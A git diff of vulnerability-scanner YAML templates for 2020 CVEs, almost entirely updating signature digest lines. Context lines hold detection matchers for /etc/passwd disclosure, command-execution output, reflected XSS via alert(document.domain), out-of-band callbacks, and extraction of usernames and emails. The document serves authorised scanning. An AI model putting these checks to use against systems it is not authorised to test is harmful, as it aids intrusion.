@@ http: - 'contains(content_type, "application/json")' - 'contains_all(body, "{{title}}","alert(document.domain)")' condition: and -# digest: 4a0a00473045022005dba63428e8930871b57b46f5e72ab7b9c04bd1c13510e7cdf910a5711c1479022100909063ff5616be8a955d4575149d4771aeacfd7a8b51cfad4383055f99ab1a52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220799cfd01dc47db47845e9068ed4b9ef6a0d4f0db92a032c192d57daea84e4e70022100b898598bf27745cdfb8c66f78498265ce26a994bfa5e159e6d7fe8833d33d903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index c886b3146a0..ba60da42237 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -97,4 +97,4 @@ http: regex: - '"url":"([a-z:\\/0-9-.]+)"' part: body -# digest: 4a0a00473045022100abc05d58e0e5794c2f056b23ffd630d3803b441242bab73f6fa976773c20a2ac022023a8a9c50212551c2a35b783103a458d548374bd589d88504706a20742ece14d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022014399be9da51dcc78cac11e19670ad6c19eb62a660f30644a6736bd453734f8b02206015654dee1198fc5a2592717c35e58478bc73c3487ede45d1f783aae8af4fc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 867d4cff4db..d001d35cc37 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207edee2a9bdb7b8add72090e9f51cc37ddb856c123c2b8a00e16b9d07eda43d3a022034b5094bbb8f8b251fd5d3deb6e998cc49a296745525f206e845850855d66d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097de4106e5244f50f710dbdcf719c3951b2b82f911c957d13ad8cd35f3ab4fa9022068a5536e1d56b85f733d7a09b2e564e3e3e488225670e3ddd4c38bb032aa7c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24285.yaml b/http/cves/2020/CVE-2020-24285.yaml index 9c357858193..1d74f6976aa 100644 --- a/http/cves/2020/CVE-2020-24285.yaml +++ b/http/cves/2020/CVE-2020-24285.yaml @@ -48,4 +48,4 @@ http: - "regex('root:.*:0:0:', body)" - "status_code == 200" condition: and -# digest: 4a0a0047304502207878bbffd8deceb7857995750fc465845bd95d022046d6bbc12f8c7e13a509c7022100fa307617e5cb996a9008d59b39ccec9b6e26d8c31113ace5a79f600b278c1b54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f976a83e7b19c540cae7321cbe7d15b552ba02e87fe80b9e0a6c697c63de051c02206c988539895f537f55cbc9c1c092826f2e9ba064c4ecd193c65c6718d86de1ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 4a5721a95bb..e5410527734 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008f7a49fd530fb15a884d107b463e3b5aa4fc8e25b6f4622c00887425bb26fd9a022100b1170c748fb4468eba32cc1fb608f158687c990283e71e816fbfa9d64123b969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aeb73758553ea86e23c8a7b09896beb445b95fd35410aa009cf98a6f929fc003022100bcb0e79f473bc951c8c16907c0f8559bc453541dcc8a173e6a1bc97f2adfcd13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index fa24aefb236..b7da182a8f9 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -62,4 +62,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 490a0046304402207bf3407e386c60b568ad04100eec112106c2bc1bc2c876ecb39399b747a7dd9a022060c3ef021e25e886031337f91f28c5c4abaf6650eda1f39bb318ce5385b6988d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026b6c4460ddf084c039d673573312918b287d31f009f6894d8c148e8acfc15f1022100e9cc1e153157f0f5aaf575a5daf3e5cf0efba8b2fa845ec92c0192589e466bec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 53bc68c13f6..366a9ccfec4 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 301 -# digest: 490a0046304402203827ee69633cd6f3b1880f299da6dba0d3fcce5199b032f6c98452513667843d02200bc5e44c0d9c76427c2477d3f518753cc47d7d2cb6c28a8e87cbbbd5d3a16daa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8d785840274d0bf2571335457a3fbbaecf61ada65534362f5f20c8aab24ed7a022100cc140f484e99ee824b61dd2318801d767fc4b4e6dd79bc4d8585fc76553c6bbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index ad256939532..11c68199375 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b780ef52c9be52addc15f6b51dfbab76cf90c18ec4a98c0cd1a8eff2f746b420221009eace59acca10808414503803a5e7132514f8526ddb9364d5e1648d135069e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c427a04babd6ed59a4973b72707fe1657515fc8af88a3fef1dbaa95413c07b6b022100e5ba17b1bd49c9b558954e64380648191bdd9ac0f6bde27e1a80e0fb7db14fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24881.yaml b/http/cves/2020/CVE-2020-24881.yaml index 7a9bc811716..68289455bfa 100644 --- a/http/cves/2020/CVE-2020-24881.yaml +++ b/http/cves/2020/CVE-2020-24881.yaml @@ -148,4 +148,4 @@ http: - 'contains(content_type, "application/pdf")' - "status_code == 200" condition: and -# digest: 4a0a00473045022100b604791a8088c88fb06a9ffca2b485bcb89708b4d33796d862ef00ac926075bb0220158cf99aa6f616dd6c9ff958c8295a40a15c033407650ea896e790b6e7b710b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c49ae67d7d05291ffcdd0ecebad7daa0e2c797fe9f2d6347b2812dfef989372f0220086df66e167bd7ea44fd20bbe04a8dd6f908125a7626bce00ef93d349f5f8a3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index b05bf322fef..b21d9a1e98a 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203562745eb709443188a50e08c7b6dbf368748e7cd4d88931dc4759d1a207beb20220352d920160df9611c921fb30d293359872c78a249c44ec6e60ae1f09f04476a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100caa843cc5abd7c7bfb0bd4ce9d7b2a1e2b713527d5cf359bc46524ef692597cf022074269fbb5f1902f94d07757188cd5c1d822148721f1e35563a72fb1e48cf4931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 69aab88229e..570c6eb455b 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f05eff87370a30476a73428ee8255c10d5fe9dc8d41825af10f623fe94c8aeb022100a53e4d0805614f030ddb5595bca5fa1d9a7056c9ff144b951fa1b40d3c8d8558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ba355c7ee644ceb0c0fc6ec5d18a819ebbe91b4a6486a2d91970e59ffe7447902200f2fc3c5a3cdbb9119d85a88151a3727bbeebceed1f2a442fc8db0054a7e627e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 918e5fa90e6..f7fcd11cf14 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -52,4 +52,4 @@ http: part: header words: - 'Content-Type: text/html' -# digest: 4a0a004730450221008bedbdbbe7062f0077ffda17bdc740621287bcbd2e3a4bb50ef4012f3da0293d02203f91781d1e17dd0ff8c4e973b15d0c5174f0f6d1b9ff1b3016d8d8bb5eb7cd96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a4e14ffdb894b0410014461a280970a3d593bce07faf9410acf6dfdd80b35b0022100c19d29eaf89f13d948b21c29d889d2325b7a3bd2b5d2c6ca3689d8c8b843c3bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 7c1f0e4c64b..8e38ac897d5 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b16e5d7ce37ebaff8eab24d4a7e03fd3afedef9424d219deda28fba3d9eeb1b0220050c77c31fcbc5de89725f53f1a156b0dec4487ecbed1eef71e20caadfdb6786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022048e68e1da7dc975bf3c4b5091ab5258560d172e888b326bcd16312745b23af9702210085d0f9acb6b9d3b190c70b636bc7571b87b43fe65dae48e681666f0d8bf62a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25200.yaml b/http/cves/2020/CVE-2020-25200.yaml index f939689cf15..bf521a437d6 100644 --- a/http/cves/2020/CVE-2020-25200.yaml +++ b/http/cves/2020/CVE-2020-25200.yaml @@ -84,4 +84,4 @@ http: - 'contains_any(body, "Too many authentication attempts", "auth_too_many")' - 'contains(header, "application/json")' condition: and -# digest: 490a00463044022017ea48b4eec73555a01713094e832db333567193d002f890d8ddddf90fe8c843022027136b420cb87414283744c0bf0dea81a1b4bc6fb142ffd16dbdd58015851fac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207694faddc3fc0ed71a1291b34f54b13f4d2ff82739a9744f0e9c7dbc87af753f022071cd639ed00ee26ed2253ea7a72185bcfab70b4af4907460754bcd0f3c2c3ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index ef611ebfa9b..372f5d207e1 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -79,4 +79,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a87fba1b5d639d2d6550ec465a10198ab5933dd3b643afc4acefd7cf78e9d433022100a8cf2fe8149cf8b5f1f53242bbdba0196cc8b65a2d62306500171c0993d2b69f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e9030a4c2deba9513234ce06243da4283569014891813cb43fcb60c90a2adf9022004b38ee52a02b0d3ab81075250d58a5c9c17ec45541be8d6dbdf37a68ac7243e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index c9d4ccc9a3b..cb2b627d684 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -57,4 +57,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100ac2b1a48137c96ac5bb7161ce41eea7bfbf6c8b9f0ffb07b75856307cc6da244022100fd4612e5b7839f2452c5a287831b47b956f0a8347c84773cfa0be8a93c10d688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b710f311f16d5f842c9e99a93b9dc09784a3ff93a40fbb0812f091adecc47ef022100d88362046dcee32585d790c07acd65819981693879c189f1871ce407bbf3b5de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 0b205357519..8483a367834 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d37b7e9f64a23390d9454e3a4479dff10ae1640edc66715ffd73a297d3c00fa5022100cd169fe708834dfacdeca169e157fdab99d47328e746ed2a56e02ed7e518c3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220789980f05d546829cf784874e43940b3e3e3606be5314d52b72cb504366323ac02202c9b79d9f9902956afaf17e8ca8313324c51e3ae5dbe3dc10e72cb3cbc40a99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 32a70b7762c..cf5f4263092 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051eec3e5c0a2b2588a74f2934db3ba170febc94c7401ca79d6103f3a77e98279022100ae99cbd4841487731d023c66ebd56071f3af83190a1c0d13fbf9b72ca5bb08f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4a129c89ffe0bf0ea680e1b2665369c8940387145ed754e9ad8b8c7dc2bd54302203dd42ce88c24bc24a1ab33166a54c0d80023bd04321c9691b78532093aa97d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index 3f82891db3b..411b62bacf4 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b805b076fc7c34aa4d25892133fb66d1d6590f2ed606f8abf845ac6d37469381022076128fd2653681c6f47f9700c6d45d258cac2900c5586fdf0364a8200919a8a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220424f3fe9862878b35569ec085664028651de8e608ca32c57e44ca7a744cd1984022016418ca55366d78e7c8650825027509c14a40bafa49eb710d7e331687553c99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index 384a5408ace..dfa4e61d7d0 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -36,4 +36,4 @@ http: regex: - "root:.*:0:0:" part: body -# digest: 490a004630440220529ca1b13e38039a4e7dbfaec84bbd8cb352afd4f661128739c9eb11f565fd16022050ad05beb0c5e9a7ebc204cf084179b4e63d3336766bc0a752d18deaade74ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c37a9f986973ceb1cbee8e628792b50c962d5cf059136a886857da48c9008f4a022100cc7eef061cb17eec619c6511745e280cf57495579796f19b97c6f9c241b74493:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 41680a16acb..a6ed98d1db4 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -65,4 +65,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 4b0a00483046022100a2a2852fb0a7abc123288239a37a0e15cc752f13e631653d0d2095480684ce62022100cb18cb6c08204b5606213b4fa97da4579196bc0d92178bdc31a3ca36c4a07e6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040ceefb901c3d0e112cd84e30a660d2964d9729d463bf351ebacad5b9a848d85022100ac7a1d2d1aecc2f2cbba8d4a418541047e0e445b64fa33a78d3f1b116c298d4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26836.yaml b/http/cves/2020/CVE-2020-26836.yaml index 6efcca0d035..9044ca8a611 100644 --- a/http/cves/2020/CVE-2020-26836.yaml +++ b/http/cves/2020/CVE-2020-26836.yaml @@ -47,4 +47,4 @@ http: - "Location: https://www.interact.sh" - "Location: https://interact.sh" condition: or -# digest: 490a004630440220226bffb247c8f81f84d1d9a66a3538c1a85a76246bacecadfaa695dc0fcfcfd402207d26698b10c0e36fd0c581fe022d8d0ee7cb4c5ccbe0c97c5736c7b4b5037458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a5319893078e27a87709a7729250d8c6fed002c2378373f7e08f55925bfb4150221009b1bdc7d99b750fdacd3c607188015443f5f91e603dc7dc212e84b504afa8e35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26879.yaml b/http/cves/2020/CVE-2020-26879.yaml index 20e60de5b85..12ba02d5e06 100644 --- a/http/cves/2020/CVE-2020-26879.yaml +++ b/http/cves/2020/CVE-2020-26879.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206dc42288dc686ab3d060f62edec81b78dd733b6ea559f4dc8a378d1b6a0190d4022100c36c79b66a3f338a8b91a504240890b2269eb5f4179286615bb1c9b86ef32ed5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204561d6561a971e43baa8b90b1e6ab2dbb2d1de84b8b064ee1ce488025aa6b0d2022100a6351db6ce0d0612f10c8779b510c5931ae8a2c9cfd5729d8e8bf0c1199cec4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 2e6b948a4d1..18ea22efd1a 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100830fd12e94c518571684c1162808ad8ac67b836a1079cf05681899460f7189530221008882e297411ce662dfa027a45c2c9bd7a95711fe09489777bc113f59cca2d940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021b546eb01b3a08243c48c973143331f6467827842df7c4b39c0c36f8f2c791e02201b5591a60753e418c986f243d0ffb4ee85dab6cae795f61c6580dbb8f1de8e34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index 2fbfc8b7577..3dcabed607f 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042975a8a633cc9e7c27cd4ea723c3eb1a2021952a12b4fe770ad0bcab30d674a0220485768e6f19dce33cb1bad42359c437979d37d6079ef45b9fcf2cec73531f047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d219988e8f56ffe2992d0208a43b765795e16008861c5fa89dbc38dfed532810220786ac755bbac41c358a7eec798bf2297e1a9aa68833975ac83e82322fb40ceec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 55cb7f03dc7..3f7b4a284c3 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -46,4 +46,4 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and -# digest: 4a0a004730450220708f9295d07be595ab3de90a5e61f19f6368fb49ade94561a7e4002241db1854022100b52a9f4b3b64a3ed154536e8d7c03b2e81845106514ffd61e99ea07964fa4dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f52b4363304dbbc14d40f53d699431af0ba8e9df6d828468c60b64d9f2f01dd022100b7f9790664acacd7c0afff4c45dd82c36e8aff455de3a889306a188925ce2255:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index f1f4d1714e4..292bc3d98e8 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201fb688712ff94bc2b865879691ed3ae90dd476ff52c3f7ca150c554a7d782988022100b292b452406e13948583f3300a1f56f9342b3a4608cec3e9e7d0c489f2417a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cf4aa8472e9b7cee293a9cdb30302fc4764710be94f5eac7bb62ae77735e0b502201ae82cc22592a5b7696d1183e1cf78e399697463996e943c86e4fb36d4e7f940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 69a300b03b1..8bd8520e371 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -68,4 +68,4 @@ http: regex: - '"username":"(.*?)"' - '"email":"(.*?)"' -# digest: 4a0a00473045022100905296faeaee83431089b66c20f52ba4a524c7ef0eb0c97fe054702e5277dc75022052da33df0ac45bad8a99dc23406e1099c34986092ed1da040de052c33acd2331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0fa520f456942071abede20862bd0717fba1dfb9e7c8522527526d57a2f315002204b32db1a190f1f7499f16356003fe483f1b96caad0be04270bfa1f703c92a1fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 61ce8a34a1b..7c9299d5a3a 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005f1d8199e0644d82d2ef069af5354dedb0dc1e537a13386a9d5cfd26f5326e30221008033db352e98eaf8fbff26ea9df48c1f43bf5a8277620c751b774639dc7d8d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001013a04518bc5430d9ce60a2ee64a937c77b3889a11fb6baa299a7d514fa362022100f9809e4d75b507bf0c15d297fede25f5e91a30ca7ab06f24480c4c07187a0c80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index 9b55eeec7ea..231fad3077f 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -73,4 +73,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b195fea2359db2f95ef345411c5ec4310413ee91ba8eebbe8dbcc2d17120a3c02204512491b37fecec751f90553a4491d2328a2ed0aa53720736eae3873579aaf95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f88eea3b74307d4861a95c5afe3ca3ff355152a5f8bb57cba0917dbf5b8338f30221009be69ed72462a6e44a2b4861d14ad5e4ab9126ceb74f6fec3a6f47b1297c4d1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index a3abe84a624..1397145bc15 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -73,4 +73,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f15fa54c13dd68a53fffcc44d4aad18e6025b00fed3a962e0fb2f2b3bdf3a3910220593f1b725dc4ecb04d9a01be0bead38fc755e0bcd6c259dfc7812c9571d24c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6f2dfc141bb658ce596b23763df38751219f024637448c66c4d3038cd4b92960220038fa6745b7c80e19f212dcdd7adabf42c71f7165e88b64dfafa280b4fc3eeb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 737a9ab9caf..da6522f0fc8 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022046dd942392848c1e0d2a5677e046e51d6c1b67efadb468b2065077b97a12ec2002202f2e307cb7f48ab396cc41f9905126d4fc94ee689e3aa0c201f380bce531df2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea782f11df7523bf180168ec940a81d3650fdaedde455dcd1cefec68ca3b737a022100e9048d749ce04fbf3acc9c6a92bfbed75e86bbd62332076d50516888af14a895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29214.yaml b/http/cves/2020/CVE-2020-29214.yaml index 624cce3f854..33dbc813736 100644 --- a/http/cves/2020/CVE-2020-29214.yaml +++ b/http/cves/2020/CVE-2020-29214.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e57301650ba7b4151716f4d84866a449ece022108bb500f4e1c862eaa824b1f7022100b62b07477dcdd2c32cbbb484a8cc11bf82853da41b5dd64b5e70537313923fbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b8e0f9848113e74a05e3e764ba89ad008f492e98d9420d78e8996194db019ba022100ec8e256e879dc7acca431f91a9c2df1f389aa64312273d728f63f204c7ad2015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29279.yaml b/http/cves/2020/CVE-2020-29279.yaml index d52cf45988d..3e6b15b34c5 100644 --- a/http/cves/2020/CVE-2020-29279.yaml +++ b/http/cves/2020/CVE-2020-29279.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207af3470ceec6c70f7d26642200268b3aede1c5ceb587df2e3c9e5ad448c52e40022100f9fae100ede750b74490a6c6cdf523e37d15ef6a0d1140f9a9f51e638e637748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c015126a7365689906d5fe416638d1dc6994a19cd65334b3a1dc91c3b5e1c71022073b1affc48739b24eb829b4768b429a62f1e12903c0768054e914b686409eaca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29390.yaml b/http/cves/2020/CVE-2020-29390.yaml index a29922826b3..a1e290ea847 100644 --- a/http/cves/2020/CVE-2020-29390.yaml +++ b/http/cves/2020/CVE-2020-29390.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206dca9d64005cb6ad8b16e6bba73ef959049df3683430bf663ded4a7b72a1c228022100e9a08693380d0e80be757197993d866700b704d5951ea6963cf05a4caf6c1253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090f5032d2c4e3866bf7e250bb4a9f3f67eceb73e36f4cca8dc6f95e3111094b8022100fe5da0657ddc996dcf8be536456e705543bc4679310c5919ffb891bc906ffe31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index aadf942133c..775058ec57b 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -73,4 +73,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f39dfa0b03f4a78cd1d54726e146d03c75bd71ab5f5a92d597164ac9d86bd27702203edaf6ad4e067e8526a72bd53fad4313dea34549f71b9d63e020e66de8ee5ff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015363f1dd295d7bf3dccda560ba2271b46fad8c4c6004df5c7dae5b42978a7970221008bb1782179df68d4ef6cad105f540016a3e9da073e86b23b288ea003bf41ba1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index 3d8c347e240..2ea89041bdb 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -59,4 +59,4 @@ http: part: body_2 words: - '{{randstr_2}}' -# digest: 